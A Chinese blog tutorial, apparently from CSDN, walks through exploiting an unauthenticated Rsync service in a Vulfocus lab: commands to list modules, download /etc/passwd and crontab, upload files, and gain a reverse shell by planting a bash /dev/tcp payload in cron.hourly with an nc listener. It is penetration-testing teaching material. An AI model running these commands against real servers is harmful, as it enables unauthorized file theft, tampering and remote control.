应用协议安全:Rsync-common 未授权访问.

应用协议安全:Rsync-common 未授权访问.

Rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配置 ACL 或访问密码,我们将可以读写目标服务器文件。


目录:

[应用协议安全:Rsync-common 未授权访问.](#应用协议安全:Rsync-common 未授权访问.)

[Rsync-common 未授权访问](#Rsync-common 未授权访问)

[靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客](#靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客)

漏洞的测试:

第一步:测试漏洞有没有存在.

[第二步:测试 读取文件.](#第二步:测试 读取文件.)

[第三步:测试 下载文件.](#第三步:测试 下载文件.)

[第四步:测试 上传文件.](#第四步:测试 上传文件.)

[第五步:测试 反弹 shell](#第五步:测试 反弹 shell)


Rsync-common 未授权访问

靶场准备: Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客


漏洞的测试:

第一步:测试漏洞有没有存在.

复制代码
rsync rsync://172.16.10.130:10890

rsync rsync://测试 IP 地址:端口

第二步:测试 读取文件.

复制代码
rsync rsync://172.16.10.130:55803/src/

第三步:测试 下载文件.

复制代码
rsync rsync://172.16.10.130:10890/src/etc/passwd ./

rsync rsync://测试 IP 地址:端口/src/etc/passwd 下载到这个文件路径下

第四步:测试 上传文件.

复制代码
rsync -av passwd rsync://172.16.10.130:10890/src/tmp/passwd 

rsync -av 要上传文件 rsync://172.16.10.130:10890/路径/

rsync rsync://172.16.10.130:10890/src/tmp/passwd      #读取的文件.

第五步:测试 反弹 shell

前提条件先了解:Crontab是一种运行于 Linux系统 下的定时任务管理器。它可以在指定时间执行特定的命令或脚本,并且可以设置重复周期.

复制代码
直接下载 crontab 文件:

rsync rsync://172.16.10.130:10890/src/etc/crontab /root/bgxg.txt


所以知道他17分钟后执行这个文件,我们就可以创建一个反弹shell的文件来替换他.


复制代码
touch bgxg        #创建新文件.

vim bgxg          #编辑文件.

#添加在文件中的内容
/bin/bash -i >& /dev/tcp/172.16.10.130/5566 0>&1

chmod +x bgxg     #添加权限.


复制代码
再进行上传bgxg文件,把cron.hourly替换了

rsync -av bgxg rsync://172.16.10.130:55790/src/etc/cron.hourly


复制代码
监听这个端口就等着反弹就好.(由于靶场时间比较短,就不等反弹时间了)

nc -lvvp 5566

学习链接:第57天:服务攻防-应用协议_Rsync_SSH_RDP_FTP_漏洞批扫_口令猜解_哔哩哔哩_bilibili

相关推荐
2601_961593429 分钟前
Mac 虚拟机跑 Linux 选哪个?CentOS 8 稳定版适配方案
linux·macos·centos
ljs64827395117 分钟前
智慧商城(Smart Mall):基于 Spring Boot + Vue 3 的现代化电商平台实战
linux·vue.js·spring boot·后端
技术不好的崎鸣同学27 分钟前
[ACTF2020 新生赛]Include 思路及解法
算法·安全·web安全
run21professional34 分钟前
系统包管理器和语言级包管理器的区别,及其源配置
linux
阿成学长_Cain36 分钟前
Linux grpck命令超全详解|校验组文件完整性、修复/etc/group错误实战
linux·运维·服务器·网络
进击切图仔37 分钟前
基于千问的白盒蒸馏 SOP
运维·服务器·人工智能·python·效率
量子罐头39 分钟前
光润通发布LYSH-LAN-V1.0家庭版智能安全路由器 主打国密级硬件加密
网络·安全·智能路由器
Yofune安全研究41 分钟前
《邮件钓鱼攻防工程》Part 1:从 GoPhish 的天花板谈起
安全
杖雍皓1 小时前
没有服务器如何构建现代 Web 应用:平台选型与组合策略
运维·服务器·前端·react.js·github·netlify·vercel
指尖的爷1 小时前
Ubuntu 24.04 彻底关闭自动更新(桌面+服务器通用)
服务器·数据库·ubuntu